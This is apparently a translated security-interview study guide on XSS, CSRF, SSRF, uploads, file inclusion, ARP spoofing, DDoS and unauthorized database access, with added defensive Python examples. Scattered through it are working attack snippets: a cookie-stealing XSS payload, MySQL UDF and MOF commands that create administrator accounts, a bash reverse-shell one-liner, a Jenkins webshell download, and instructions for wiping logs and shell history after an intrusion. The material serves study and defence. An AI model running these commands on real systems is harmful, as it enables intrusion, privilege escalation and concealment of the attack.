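The sentence about HTML being parsed before JavaScript is the one people get wrong, so here is an added example, not code from the original page: an HTML encoder, the strict JavaScript encoder described above (every non-alphanumeric character as \xHH), a check for whether a value breaks out of a single-quoted JavaScript literal, and the two orderings side by side for a value placed in an inline event handler such as onclick="greet('...')". The payload and the handler layout are constructed for this example.

```python
import html

def html_encode(value: str) -> str:
    """HTML body/attribute context: & < > " ' become entities."""
    return html.escape(value, quote=True)

def js_encode(value: str) -> str:
    """JavaScript string context, the strict option from the text: every
    non-alphanumeric character becomes \\xHH (or \\uHHHH), so the value can
    never contain the quote that delimits the literal."""
    out = []
    for ch in value:
        if ch.isascii() and ch.isalnum():
            out.append(ch)
        elif ord(ch) < 0x100:
            out.append("\\x%02x" % ord(ch))
        else:
            out.append("\\u%04x" % ord(ch))
    return "".join(out)

def js_literal_breaks_out(inner: str) -> bool:
    """True if `inner`, placed between single quotes in JavaScript, contains
    an unescaped quote that ends the literal early."""
    escaped = False
    for ch in inner:
        if escaped:
            escaped = False
        elif ch == "\\":
            escaped = True
        elif ch == "'":
            return True
    return False

def onclick_handler_sees(attribute_value: str) -> str:
    """Browsers decode entities in an attribute before handing the result to
    the JavaScript engine (HTML parsing comes first). This is the handler
    code the engine actually sees."""
    return html.unescape(attribute_value)

PAYLOAD = "';alert(document.cookie);//"   # constructed attacker input

def render_wrong(name: str) -> str:
    # onclick="greet('...')" with HTML encoding only: the entity for the quote
    # is decoded back into a real quote before the script runs
    return html_encode(name)

def render_right(name: str) -> str:
    # JavaScript-encode for the inner context first, then HTML-encode for the
    # attribute context; the decoded handler still contains no quote
    return html_encode(js_encode(name))
```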

6. Conditions for an XSS worm

Usually the XSS point must not sit on a page only the user themselves sees (self-XSS); pages where users interact with each other are where an XSS worm can arise.
Stored XSS is not strictly required.

11. CSRF

1. Principle of CSRF

CSRF is a cross-site request forgery attack, initiated by the client, because there is no confirmation whether the user voluntarily initiates when the key operation is executed

2. Defense

Verify Referer
add token

3. Comparing the token and the Referer side by side, which has the higher security level?

The token has the higher security level. Not every server can obtain the Referer: when jumping from HTTPS to HTTP the Referer is not sent, and in some versions of Flash the Referer can be customized. The token, for its part, must be random enough and must not leak (the principle of unpredictability).

4. From what point of view should the Referer be verified, and how are the resulting problems prevented?

For verification of the Referer in the header, one problem is an empty Referer, the other is imperfect Referer filtering or detection. To prevent such problems, the regular expressions in the verification whitelist must be written carefully.

5. For the token, which aspects are paid attention to in a token test, and which aspects of the token are tested?

To quote an answer from a senior:

The attack on the token is, on the one hand, an attack on the token itself: replay tests, whether it is one-time, analysis of the encryption rules, whether the verification method is correct, and so on; on the other hand, it is obtaining the token in combination with an information leakage vulnerability and launching a combined attack. Information leakage may be through the cache, logs, GET parameters, or cross-site scripting.
Many jump logins rely on tokens. A jump vulnerability and a reflected cross-site vulnerability can be combined into login hijacking.
In addition, tokens can be discussed in combination with other services: how they can be bypassed if the security design is poor, for example when grabbing red envelopes and the like.
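The two defenses from the CSRF section (token and Referer verification) and the two Referer problems named in question 4 (empty Referer, imperfect filtering), as an added Python example that is not part of the original article. The origin `https://app.example.com`, the function names and the session dict are assumptions for this illustration; `naive_referer_check` is the imperfect filter the text warns about, shown only so the whitelist version can be compared against it.

```python
import hmac
import secrets
from typing import Optional, Set
from urllib.parse import urlsplit

# assumed origin of the protected application (constructed)
ALLOWED_ORIGINS: Set[str] = {"https://app.example.com"}


def issue_token(session: dict) -> str:
    """Bind a fresh, unpredictable token to the server-side session; embed it in the form."""
    token = secrets.token_urlsafe(32)
    session["csrf_token"] = token
    return token


def token_valid(session: dict, submitted: Optional[str]) -> bool:
    """Constant-time comparison of the submitted token with the session copy."""
    expected = session.get("csrf_token")
    if not expected or not submitted:
        return False
    return hmac.compare_digest(expected, submitted)


def naive_referer_check(referer: Optional[str]) -> bool:
    """The imperfect filter: a substring match that any attacker URL can satisfy."""
    return bool(referer) and "app.example.com" in referer


def referer_allowed(referer: Optional[str], allowed: Set[str] = ALLOWED_ORIGINS,
                    allow_empty: bool = False) -> bool:
    """Compare the full origin (scheme, host, port) of the Referer against a whitelist.
    An empty Referer is a policy decision: rejecting it breaks HTTPS->HTTP jumps and
    privacy-stripped clients, accepting it lets a request without Referer through."""
    if not referer:
        return allow_empty
    parts = urlsplit(referer)
    if parts.scheme not in ("http", "https") or not parts.hostname:
        return False
    default_port = 443 if parts.scheme == "https" else 80
    try:
        port = parts.port or default_port
    except ValueError:          # malformed port component
        return False
    origin = f"{parts.scheme}://{parts.hostname}"
    if port != default_port:
        origin += f":{port}"
    return origin in allowed


def request_allowed(session: dict, submitted_token: Optional[str], referer: Optional[str]) -> bool:
    """Defense in depth: the token is the primary check, the Referer a secondary one."""
    return token_valid(session, submitted_token) and referer_allowed(referer, allow_empty=True)
```

`urlsplit` parses the authority properly, so `https://app.example.com@evil.net/` yields hostname `evil.net` and `https://evil.net/?app.example.com` yields `evil.net`; both pass the substring filter and fail the origin comparison.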

11. SSRF

SSRF (Server-Side Request Forgery) is a security vulnerability in which an attacker constructs a request that is then initiated by the server. Typically, SSRF attacks target internal systems that are inaccessible from the external network (because the request is initiated by the server, it can reach internal systems that are connected to the server but isolated from the outside).

Most SSRF vulnerabilities arise because the server provides a function that fetches data from other server applications without filtering or restricting the target address: for example, fetching the text content of a web page at a given URL, loading or downloading an image at a given address, and so on.

1. Detection

Verification method of SSRF vulnerability:

1) Because an SSRF vulnerability lets the server send requests, we can capture packets and analyze whether the request was sent by the server to determine whether an SSRF vulnerability exists.

2) Look for resource addresses fetched in the page source code. If a resource address has the form www.baidu.com/xxx.php?image=(address), there may be an SSRF vulnerability.

2. Cause, defense and bypass of SSRF vulnerabilities

Cause: the server makes requests to other servers' resources on the user's behalf without validating the target. Exploitation: construct an internal IP to probe the intranet, or use other supported protocols to attack other services. Defense: prohibit redirects, restrict the protocol, separate internal and external networks, and restrict the URL. Bypass: use different protocols, IP-based bypasses (alternative IP formats), extra characters in the URL, malicious URLs, @ and the like, 301 redirects plus DNS rebinding.
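The defense side of the list above (protocol restriction, internal/external separation, URL restriction) as an added Python example, not code from the original article. It also covers the bypass categories named there: alternative IP formats, the `@` userinfo trick, and the DNS rebinding / redirect cases, which are handled by pinning the connection to the validated IP and not following redirects. The function name, the injected `resolve` callback and the host table in the test are assumptions; `93.184.216.34` is used only as a stand-in for a public address.

```python
import ipaddress
from typing import Callable, List, Optional
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}


def is_public_ip(ip: str) -> bool:
    """Reject loopback, RFC 1918, link-local (169.254.x.x metadata endpoints),
    reserved, documentation and multicast ranges."""
    addr = ipaddress.ip_address(ip)
    return addr.is_global and not addr.is_multicast


def validate_fetch_target(url: str, resolve: Callable[[str], List[str]]) -> Optional[str]:
    """Return the one public IP the fetcher may connect to, or None to reject the URL.
    `resolve` is injected (it would wrap socket.getaddrinfo in production) so that the
    check runs offline and can be unit-tested."""
    parts = urlsplit(url)
    if parts.scheme.lower() not in ALLOWED_SCHEMES:                # file://, gopher://, dict:// ...
        return None
    if parts.username is not None or parts.password is not None:  # http://trusted@victim/
        return None
    host = parts.hostname
    if not host:
        return None
    try:                                   # dotted-quad or bracketed IPv6 literal
        ips = [str(ipaddress.ip_address(host))]
    except ValueError:
        try:                               # integer forms such as 2130706433 or 0x7f000001
            ips = [str(ipaddress.ip_address(int(host, 0)))]
        except ValueError:
            ips = resolve(host)            # a hostname: every answer must be public
    if not ips or not all(is_public_ip(ip) for ip in ips):
        return None
    # The caller must open the socket to this IP (not re-resolve the name) and must not
    # follow redirects automatically; otherwise DNS rebinding or a 301 to an internal
    # host re-opens the hole after validation.
    return ips[0]
```

Returning the resolved IP rather than a boolean is deliberate: the HTTP client then connects to the address that was checked, which is what defeats the "resolve once to a public IP, then to 127.0.0.1" rebinding pattern.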

12. Upload

1. The principle of file upload vulnerability

Because the programmer does not control, or has defects in processing, the part where the user uploads files, a user can upload an executable dynamic script file to the server beyond their own authority.

2. Common upload bypass methods

Front-end JS verification: disable JS, or modify the request with Burp
Case variation
Double suffix
Filter bypass: pphphp -> php

3. Protection

The file upload directory is set to be non-executable
Use a whitelist to determine the file upload type
Rewrite the file name and path with random numbers

4. What is the point of reviewing the elements of the upload point?

Some sites implement the uploaded file type limitation on the front end; in that case, adding the desired file type to the accepted list in the page elements is enough to break the limitation.
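The three protection items above (non-executable directory, whitelist of types, random rewritten name) as an added Python example, not code from the original article. It is written so that the bypasses listed earlier (case variation, double suffix, the pphphp trick, null bytes, client-supplied paths) all fail the same check. The function name, the extension whitelist and the magic-byte table are assumptions for this illustration; the sample file contents in the test are constructed.

```python
import os
import secrets
from typing import Optional

# whitelist, never a blacklist: anything not listed is refused
ALLOWED_EXTENSIONS = {"jpg", "jpeg", "png", "gif", "pdf"}

# leading bytes expected for each allowed type (constructed table)
MAGIC = {
    "jpg": b"\xff\xd8\xff",
    "jpeg": b"\xff\xd8\xff",
    "png": b"\x89PNG\r\n\x1a\n",
    "gif": b"GIF8",
    "pdf": b"%PDF-",
}


def check_upload(original_name: str, content: bytes) -> Optional[str]:
    """Return a random server-side file name if the upload is acceptable, else None.
    The returned name is what gets written, into a directory that has no execute
    permission for the web server; the client's name is never used on disk."""
    base = os.path.basename(original_name.replace("\\", "/"))   # drop client-supplied paths
    if "\x00" in base or "." not in base:                        # null-byte truncation, no extension
        return None
    ext = base.rsplit(".", 1)[1].strip().lower()                 # last suffix only, case-folded
    if ext not in ALLOWED_EXTENSIONS:                            # shell.php, shell.PhP, shell.pphphp, shell.jpg.php
        return None
    if not content.startswith(MAGIC[ext]):                       # name says jpg, bytes say otherwise
        return None
    return f"{secrets.token_hex(16)}.{ext}"
```

Taking only the last suffix, lower-casing it and comparing against a whitelist makes the case and double-suffix variations irrelevant, and the random name means a file like `shell.php.jpg` is stored as `<random>.jpg`, so a web server that maps multiple extensions to handlers never sees the `.php` part.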
13. File inclusion

1. Principle

The server executes functions such as include() that import the files to be included through dynamic variables; when the user can control those dynamic variables, a script or code chosen by the user is introduced.

2. Functions that cause file inclusion

PHP: include(), include_once(), require(), require_once(), fopen(), readfile(), ...
JSP/Servlet: java.io.File(), java.io.FileReader(), ...
ASP: include file, include virtual, ...

3. Local file inclusion

Vulnerabilities that can open and include local files are known as local file inclusion vulnerabilities
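How the "user controls the dynamic variable" problem from the principle above is closed, as an added Python example that is not part of the original article. The preferred fix is to let the variable select from a fixed map; where a path really must be built, the path is normalised and checked to stay inside the base directory. The `PAGES` map, the function names and the `/srv/app/pages` directory are assumptions for this illustration.

```python
import os
from typing import Dict, Optional

# constructed allowlist: user-visible page keys -> files chosen by the server
PAGES: Dict[str, str] = {"home": "home.php", "about": "about.php", "contact": "contact.php"}


def resolve_page(requested: str) -> Optional[str]:
    """Preferred fix: the dynamic variable selects from a fixed map, never a path."""
    return PAGES.get(requested)


def safe_join(base_dir: str, relative: str, allowed_suffix: str = ".php") -> Optional[str]:
    """Fallback when a map is impractical: normalise the path and refuse anything that
    escapes base_dir, is absolute, looks like a remote URL, or carries a null byte."""
    if "\x00" in relative or os.path.isabs(relative) or "://" in relative:
        return None
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, relative))
    if os.path.commonpath([base, target]) != base:   # ../ sequences resolved outside base
        return None
    if not target.endswith(allowed_suffix):          # only the intended file type is includable
        return None
    return target
```

`os.path.realpath` resolves `..` segments and symlinks before the containment check, so the comparison is made on the path the operating system would actually open.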

14. Logic vulnerabilities

1. Common logic vulnerabilities in the financial industry

For financial business specifically, they are mainly data tampering (involving financial data, or the judgment data of some businesses), race conditions or improper design, leakage of transaction/order information, unauthorized viewing or malicious operation of other people's accounts, and bypassing of transaction or business steps.

15. Man-in-the-middle attack

A man-in-the-middle attack is a (lack of) mutual authentication attack; a vulnerability caused by the lack of mutual authentication between the client and server during the SSL handshake

Solutions to defend against man-in-the-middle attacks are usually based on the following technologies

1. Public key infrastructure (PKI): use the PKI mutual authentication mechanism, in which the client verifies the server and the server verifies the client. In the two examples above only the server is verified, which leaves a loophole in the SSL handshake; mutual authentication is essentially a stronger form of authentication.

2. Latency test

Computations using complex cryptographic hash functions result in delays of tens of seconds; if both parties typically take 20 seconds to compute, and the entire communication takes 60 seconds to compute to reach the other party, this could indicate the presence of a third-party intermediary.

3. Use other forms of key exchange

ARP spoofing

principle

Each host has an ARP cache table that records the correspondence between IP addresses and MAC addresses, and LAN data transmission relies on MAC addresses. The ARP cache mechanism has a defect: when a host receives an ARP reply packet, it does not verify whether it ever sent an ARP request to the other host, and directly stores the IP-to-MAC mapping from the reply in its ARP cache table. If a mapping for that IP already exists, it is replaced. This gives an attacker the possibility of eavesdropping on the data transmitted by the host.

Protection

1. Bind the gateway MAC and IP address statically on the host (the default is dynamic), command: arp -s <gateway IP> <gateway MAC>

2. Bind the host MAC and IP address on the gateway

3. Use ARP firewall
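What an "ARP firewall" from item 3 actually looks for, as an added Python example that is not part of the original article: it walks a capture of ARP replies and flags the three classic signs of spoofing, a reply contradicting a static binding (item 1), an IP whose MAC changes mid-capture, and one MAC answering for several IPs. The capture, the addresses and the function name are all constructed assumptions.

```python
from typing import Dict, List, Set, Tuple

# constructed static binding, as the "arp -s <gateway IP> <gateway MAC>" step installs it
STATIC_BINDINGS: Dict[str, str] = {"192.168.1.1": "aa:bb:cc:dd:ee:01"}

# constructed capture of ARP replies: (sender IP, sender MAC) in arrival order
CAPTURE: List[Tuple[str, str]] = [
    ("192.168.1.1", "aa:bb:cc:dd:ee:01"),   # legitimate gateway
    ("192.168.1.20", "aa:bb:cc:dd:ee:20"),  # a workstation
    ("192.168.1.1", "de:ad:be:ef:00:99"),   # unsolicited reply claiming the gateway IP
    ("192.168.1.20", "de:ad:be:ef:00:99"),  # the same MAC now also claims the workstation
]


def audit_arp_replies(replies: List[Tuple[str, str]], static: Dict[str, str],
                      max_ips_per_mac: int = 1) -> List[str]:
    """Flag the three signs of ARP spoofing: a reply that contradicts a static binding,
    an IP whose MAC flips during the capture, and one MAC answering for several IPs."""
    alerts: List[str] = []
    last_mac: Dict[str, str] = {}
    ips_by_mac: Dict[str, Set[str]] = {}
    for ip, mac in replies:
        mac = mac.lower()
        if ip in static and static[ip].lower() != mac:
            alerts.append(f"static binding violated: {ip} is {static[ip]}, reply says {mac}")
        if ip in last_mac and last_mac[ip] != mac:
            alerts.append(f"mapping flip: {ip} moved from {last_mac[ip]} to {mac}")
        last_mac[ip] = mac
        ips_by_mac.setdefault(mac, set()).add(ip)
        if len(ips_by_mac[mac]) == max_ips_per_mac + 1:   # alert once, when the threshold is crossed
            alerts.append(f"one MAC answers for several IPs: {mac} -> {sorted(ips_by_mac[mac])}")
    return alerts
```

A static binding (items 1 and 2) stops the host from being poisoned at all; the audit above is the complementary detection, useful on hosts where static entries are impractical.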

16. DDoS

1. DDOS principle

Using reasonable requests to cause resource overload, resulting in service unavailability

The principle of a SYN flood

Forge a large number of source IP addresses and send a large number of SYN packets to the server. The server replies to each with a SYN/ACK packet. Because the source address is forged, the forged IP never responds; the server, receiving no reply, retries 3 to 5 times and waits one SYN timeout (usually 30 seconds to 2 minutes) before discarding the connection. If the attacker sends a large number of SYN requests with forged source addresses, the server consumes a lot of resources (CPU and memory) handling these half-open connections and keeps retrying SYN+ACK to those IPs. In the end the server has no capacity left for normal connection requests, resulting in a denial of service.

CC attack principle

Continuously initiate normal requests to some application pages that consume large resources to achieve the purpose of consuming server resources.

2. DDoS protection

SYN Cookie, SYN Proxy, SafeReset and other algorithms. The main idea of SYN Cookie is to assign a "Cookie" to each IP address and count the visit frequency of each IP address; if a large number of packets from the same IP address are received in a short period, it is considered an attack and packets from that IP address are discarded.
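An added Python model of the stateless SYN cookie construction (the technique behind the "SYN Cookie" item above; this is not code from the original article, and it is a simplification of the Linux layout rather than the kernel's actual code). It shows how the server answers the SYN without storing any half-open state: the time counter, an MSS class and a keyed hash of the connection are folded into the server's initial sequence number, and the final ACK is accepted only if it carries that number back. The secret, the MSS table and the addresses are constructed assumptions.

```python
import hashlib
import hmac

SECRET = b"constructed-per-boot-secret"   # assumption: a real stack draws this at boot
MSS_TABLE = [536, 1220, 1440, 1460]        # 2-bit MSS class, as in the Linux implementation
MASK24 = (1 << 24) - 1


def _tag(src, dst, sport, dport, client_isn, count):
    """24-bit keyed hash over the connection 4-tuple, the client's ISN and the time counter."""
    msg = f"{src}|{dst}|{sport}|{dport}|{client_isn}|{count}".encode()
    return int.from_bytes(hmac.new(SECRET, msg, hashlib.sha256).digest()[:3], "big")


def make_syn_cookie(src, dst, sport, dport, client_isn, mss, now_minutes):
    """Server ISN for the SYN/ACK. Nothing is stored on the server: a 5-bit time counter
    (bits 31-27), a 2-bit MSS class (bits 25-24) and the 24-bit tag form the number."""
    count = now_minutes & 0x1F
    mss_idx = max((i for i, m in enumerate(MSS_TABLE) if m <= mss), default=0)
    return (count << 27) | (mss_idx << 24) | _tag(src, dst, sport, dport, client_isn, count)


def check_syn_cookie(src, dst, sport, dport, seq, ack, now_minutes):
    """Validate the final ACK of the handshake. The ACK number is our ISN + 1 and the
    client's sequence number is its ISN + 1, so everything needed is in the packet.
    Returns the MSS to use for the connection, or None if the ACK is bogus."""
    cookie = (ack - 1) & 0xFFFFFFFF
    client_isn = (seq - 1) & 0xFFFFFFFF
    count = cookie >> 27
    if ((now_minutes - count) & 0x1F) > 1:          # honoured for roughly two minutes only
        return None
    if (cookie & MASK24) != _tag(src, dst, sport, dport, client_isn, count):
        return None
    return MSS_TABLE[(cookie >> 24) & 0x3]
```

The point for the SYN flood described above is that a forged source that never sends the third packet costs the server one hash computation and no memory, so the half-open connection table that the attack tries to exhaust no longer exists while cookies are active.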

17. Privilege escalation

Two ways to escalate privileges in MySQL

UDF privilege escalation, MOF privilege escalation

MySQL UDF privilege escalation

Requirements:
1. The target system is Windows (Win2000, XP, Win2003);
2. A MySQL user account with INSERT and DELETE permissions on the mysql database, so that functions can be created and dropped;
3. The root account password, to export the UDF. For MySQL 5.1 and above, the udf.dll file must be placed in the lib\plugin folder of the MySQL installation directory before custom functions can be created. Enter select @@basedir; and show variables like '%plugin%'; in MySQL to find the installation path.

Privilege escalation:

Create functional functions using SQL statements. Syntax: Create Function function name (the function name can only be one of the following list) returns string soname 'exported DLL path';

create function cmdshell returns string soname 'udf.dll';
select cmdshell('net user arsch arsch /add');
select cmdshell('net localgroup administrators arsch /add');

drop function cmdshell;

This directory does not exist by default, so we need to use webshell to find the MYSQL installation directory, create a lib\plugin folder in the installation directory, and then export the udf.dll file to this directory.

MySQL mof privilege escalation

#pragma namespace("\\\\.\\root\\subscription")

instance of __EventFilter as $EventFilter
{
EventNamespace = "Root\\Cimv2";
Name  = "filtP2";
Query = "Select * From __InstanceModificationEvent "
"Where TargetInstance Isa \"Win32_LocalTime\" "
"And TargetInstance.Second = 5";
QueryLanguage = "WQL";
};

instance of ActiveScriptEventConsumer as $Consumer
{
Name = "consPCSV2";
ScriptingEngine = "JScript";
ScriptText =
"var WSH = new ActiveXObject(\"WScript.Shell\")\nWSH.run(\"net.exe user waitalone waitalone.cn /add\")";
};

instance of __FilterToConsumerBinding
{
Consumer   = $Consumer;
Filter = $EventFilter;
};

The command on line 18, please change it yourself before uploading.

2. Execute load_file and into dumpfile to export the file to the correct location.

select load_file('c:/wmpub/nullevt.mof') into dumpfile 'c:/windows/system32/wbem/mof/nullevt.mof';

After the execution is successful, you can add an ordinary user, then you can change the command, and then upload and export the execution to upgrade the user to administrator privileges, and then the 3389 connection is ok.

18. Special Vulnerabilities

1、Struts2-045

2. Redis unauthorized access

Cause

By default Redis binds to 0.0.0.0:6379, which exposes the Redis service to the public network. If authentication is not enabled, any user can access the target server's Redis without authorization and read Redis data. An attacker can use Redis's own commands to write a public key onto the Redis server and then use the corresponding private key to log in to the target server directly.

Exploitation conditions and methods

Conditions:

a. The Redis service runs as the root account
b. Redis has no password, or a weak password, for authentication
c. Redis listens on 0.0.0.0 (the public network)

Methods:

a. Through the Redis INFO command, the attacker can view server parameters and sensitive information, paving the way for subsequent infiltration
b. Upload an SSH public key to obtain SSH login
c. Obtain a reverse shell through crontab
d. Use the slave master-slave mode

Remediation

Password verification
Run with reduced rights
Restrict ip/modify port

3. Jenkins unauthorized access

The attacker enters the script console through unauthorized access and executes commands, for example println "ifconfig -a".execute().text to run system commands, then uses wget to download a webshell.

4. MongoDB unauthorized access

When the MongoDB service is started without parameters, there is no permission verification by default and the database can be accessed remotely. Anyone who connects through the default port can, without a password, perform any high-risk operation on the database, such as adding, deleting, modifying or querying.

Protection

1. Add authentication to MongoDB: 1) add the --auth parameter when starting MongoDB; 2) add users to MongoDB: use admin (switch to the admin database); db.addUser("root", "123456") (add the user root with password 123456); db.auth("root", "123456") (verify that the user was added; a return value of 1 means success).

2. Disable the HTTP and REST ports. MongoDB has its own HTTP service and supports a REST interface; these interfaces are disabled by default after 2.6. By default mongoDB listens for web services on its default port. Remote management through the web is generally not needed, and disabling it is recommended: modify the configuration file (nohttpinterface = true) or start with the --nohttpinterface parameter.

3. Limit the bound IP: add the parameter --bind_ip 127.0.0.1 at startup, or add bind_ip = 127.0.0.1 to the /etc/mongodb.conf file.

5. Memcached unauthorized access

Memcached is a commonly used key-value caching system. Since it has no permission control module, a Memcached service open to the public network is easily found by attackers, who can directly read sensitive information in Memcached through command interaction.

Verification

a. Log in to the machine and run netstat -an | more to check the listening ports. An entry 0.0.0.0:11211 means it listens on all interfaces, and a Memcached unauthorized access vulnerability exists.

b. telnet 11211, or nc -vv 11211; if the connection succeeds, the vulnerability exists.

Vulnerability hardening

a. Configure Memcached to allow local access only
b. Block external network access to Memcached port 11211
c. Add --enable-sasl when compiling, to enable SASL authentication
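The netstat check from step a above, generalised to the three services in this section (Redis, MongoDB, Memcached), as an added Python example that is not part of the original article. It parses `netstat -an` output, reports only sockets bound to all interfaces on those ports, and attaches the hardening the respective section recommends. The sample output is constructed; the service table and function name are assumptions.

```python
import re
from typing import Dict, List

# services this section lists as commonly exposed without authentication, with the
# hardening each subsection recommends (default ports assumed)
SERVICES = {
    6379: ("Redis", "set requirepass, bind to 127.0.0.1 or a private address, run as a low-privileged user"),
    27017: ("MongoDB", "start with --auth, set bind_ip = 127.0.0.1, disable the HTTP/REST interface"),
    11211: ("Memcached", "allow local access only, block 11211 externally, build with --enable-sasl"),
}

# Linux netstat -an row: proto recv-q send-q local foreign [state]
ROW = re.compile(r"^(tcp6?|udp6?)\s+\d+\s+\d+\s+(\S+):(\d+)\s+\S+\s*(LISTEN)?")

# constructed netstat -an output
SAMPLE = """\
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0      0 0.0.0.0:6379            0.0.0.0:*               LISTEN
tcp        0      0 127.0.0.1:27017         0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN
tcp6       0      0 :::11211                :::*                    LISTEN
tcp        0      0 10.0.0.5:6379           10.0.0.9:51234          ESTABLISHED
udp        0      0 0.0.0.0:11211           0.0.0.0:*
"""


def audit_listeners(netstat_output: str) -> List[Dict[str, str]]:
    """Return one finding per known service socket bound to every interface."""
    findings: List[Dict[str, str]] = []
    for line in netstat_output.splitlines():
        m = ROW.match(line.strip())
        if not m:
            continue
        proto, addr, port, state = m.groups()
        port = int(port)
        if proto.startswith("tcp") and state != "LISTEN":   # established flows are not exposure
            continue
        if port not in SERVICES or addr not in ("0.0.0.0", "::", "*"):
            continue
        name, fix = SERVICES[port]
        findings.append({"service": name, "socket": f"{addr}:{port}", "proto": proto, "fix": fix})
    return findings
```

Sockets bound to `127.0.0.1` (the MongoDB row in the sample) are deliberately not reported, since that is the state the hardening steps aim for; a port that is listening on all interfaces but protected by a firewall is still reported, because the audit can only see the bind address.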

6. The principle of the FFmpeg local file read

Encrypt the payload into a segment of bytes that will be executed by calling the encryption API. But in the actual answer I only mentioned the old SSRF hole, the m3u8 header, the offset and the encryption.

19. Safety Knowledge

1、WEB

Common WEB development JAVA framework

STRUTS, SPRING. Common Java framework vulnerabilities: in fact, when the interviewer asked this question, I didn't know what he was going to ask. I mentioned Struts 045 and 048 and common Java deserialization. 045: error handling introduces OGNL expressions. 048: in the process of encapsulating actions there is a step that calls getStackValue to recursively obtain the deserialized operation objects of OGNL expressions, introduced by this means. The reflection mechanism of Apache Commons and the rewriting of readObject; in fact, I can't remember the specifics... Then this part was over.

Same Origin Policy

The same-origin policy restricts documents from different sources from reading or setting the attributes of the current document. Sources are distinguished by protocol, domain name, subdomain, IP and port; when any of these differ, the sources are different.

Jsonp security attack and defense technology, how to write Jsonp attack page

Security attack and defense content related to Jsonp

JSON hijacking, Callback can be defined, JSONP content can be defined, and Content-type is not json.

attack page

JSON hijacking, cross-domain hijacking of sensitive information, the page is similar to

function wooyun(v){
alert(v.username);
}

When the Content-type is incorrect, JSONP and Callback content can be defined to cause XSS. For JSONP, FLASH and other applications, refer to Chuangyu's JSONP security attack and defense technology.
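The server side of the JSONP problems listed above (definable callback, definable JSONP content, wrong Content-Type, and the cross-domain hijacking the attack page relies on), as an added Python example that is not part of the original article. The endpoint validates the callback name against an identifier pattern, sends an explicit JavaScript Content-Type with `nosniff`, and refuses to wrap private data unless the request carries a valid token, which is what stops a third-party page from reading the response through a script tag. The function name and the token argument are assumptions; the callback name `wooyun` is taken from the attack page above.

```python
import json
import re
from typing import Dict, Optional, Tuple

# a callback must be a plain JavaScript identifier path such as wooyun or app.cb
CALLBACK_RE = re.compile(r"^[A-Za-z_$][A-Za-z0-9_$]*(\.[A-Za-z_$][A-Za-z0-9_$]*)*$")
MAX_CALLBACK_LEN = 64


def render_jsonp(callback: Optional[str], data: dict,
                 token_ok: bool) -> Tuple[int, Dict[str, str], str]:
    """Return (status, headers, body) for a JSONP endpoint that returns private data.
    token_ok is the result of the caller's CSRF-style token check for this request."""
    json_headers = {"Content-Type": "application/json; charset=utf-8",
                    "X-Content-Type-Options": "nosniff"}
    if not token_ok:
        # without a per-session token any site could <script src=...> this URL and read the data
        return 403, json_headers, json.dumps({"error": "token required"})
    if not callback or len(callback) > MAX_CALLBACK_LEN or not CALLBACK_RE.match(callback):
        # rejects <script>, alert(1);//, and every other non-identifier payload
        return 400, json_headers, json.dumps({"error": "bad callback"})
    body = json.dumps(data)   # ensure_ascii=True escapes U+2028/2029 and non-ASCII for JS safety
    headers = {"Content-Type": "application/javascript; charset=utf-8",
               "X-Content-Type-Options": "nosniff",
               "Content-Disposition": "attachment; filename=f.txt"}
    # leading /**/ keeps the body from being interpreted as a Flash file (Rosetta Flash mitigation)
    return 200, headers, f"/**/{callback}({body});"
```

The `Content-Disposition` header is the same defense some large sites use: it prevents the response from being rendered directly if the browser ever sniffs it as HTML, without affecting its use as a script.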

2、PHP

Functions involved in command execution in php

Code execution: eval(), assert(), popen(), system(), exec(), shell_exec(), passthru(), pcntl_exec(), call_user_func_array(), create_function()

File reading: file_get_contents(), highlight_file(), fopen(), readfile(), fread(), fgetss(), fgets(), parse_ini_file(), show_source(), file(), etc.

Command execution: system(), exec(), shell_exec(), passthru(), pcntl_exec(), popen(), proc_open()

Bypassing PHP's disable_functions in safe mode

DL functions, component vulnerabilities, environment variables.
PHP weak typing

When comparing with ==, the two operands are first converted to the same type and then compared.

If a number is compared with a string, or the comparison involves numeric strings, the string is converted to a number and the comparison is performed numerically.

A string starting with 0e compares equal to 0.
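A Python model of the string-to-string case of PHP's loose comparison, added here as an example (not code from the original article) to show why the `0e` rule matters for hash checks: two MD5 digests that both consist of `0e` followed by digits are numeric strings, so `==` compares them as floats and both are 0. The model covers only string operands and follows the numeric-string grammar (optional whitespace, sign, digits, fraction, exponent); the function names are assumptions. The two inputs in `magic_hash_demo` are well-known values whose MD5 digests have this form; the test recomputes them rather than trusting the literals.

```python
import hashlib
import hmac
import re

# PHP's notion of a numeric string (leading whitespace, sign, digits, fraction, exponent)
NUMERIC = re.compile(r"^\s*[+-]?(\d+(\.\d*)?|\.\d+)([eE][+-]?\d+)?\s*$")


def php_loose_equal(a: str, b: str) -> bool:
    """Model of PHP's == for two strings: numeric strings are compared as numbers."""
    if NUMERIC.match(a) and NUMERIC.match(b):
        return float(a) == float(b)
    return a == b


def php_strict_equal(a: str, b: str) -> bool:
    """What a password or hash check must use instead: same bytes, compared in constant time
    (the PHP equivalent is === or hash_equals())."""
    return hmac.compare_digest(a.encode(), b.encode())


def magic_hash_demo():
    """Two different inputs whose MD5 digests are both of the form 0e<digits>."""
    h1 = hashlib.md5(b"240610708").hexdigest()
    h2 = hashlib.md5(b"QNKCDZO").hexdigest()
    return h1, h2, php_loose_equal(h1, h2), php_strict_equal(h1, h2)
```

The practical rule for reviewing PHP authentication code is that any `==` between a stored hash and a computed one is a finding; `hash_equals()` fixes both the type juggling and the timing side channel.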

3. Database

Where various database files are stored

mysql:
/usr/local/mysql/data/
C:\ProgramData\MySQL\MySQL Server 5.6\Data
oracle: $ORACLE_BASE/oradata/$ORACLE_SID/

4. System

How to clean up logs

meterpreter: clearev
What logs need to be cleared after an intrusion into a Linux server?

Web logs, such as Apache's access.log and error.log. Clearing the whole log is too obvious, so sed is generally used for targeted deletion,

e.g. sed -i -e '/192.169.1.1/d'

The clearing of the history command is also a directed clearing of ~/.bash_history

Clearing of wtmp logs, /var/log/wtmp

Clearing of the login log /var/log/secure

What Linux commands check the current port connections? Differences, advantages and disadvantages of the netstat and ss commands

netstat -antp; ss -l

The advantage of ss is that it can display more and more detailed information about TCP and connection status, and it is faster and more efficient than netstat.
Common commands for reverse shell? Which kind of shell usually rebounds? Why?

bash -i>&/dev/tcp/x.x.x.x/4444 0>&1

What information can be obtained through the /proc directory of the Linux system, and what applications can this information be used for security?

ls /proc

System information, hardware information, kernel version, loaded modules, and processes.
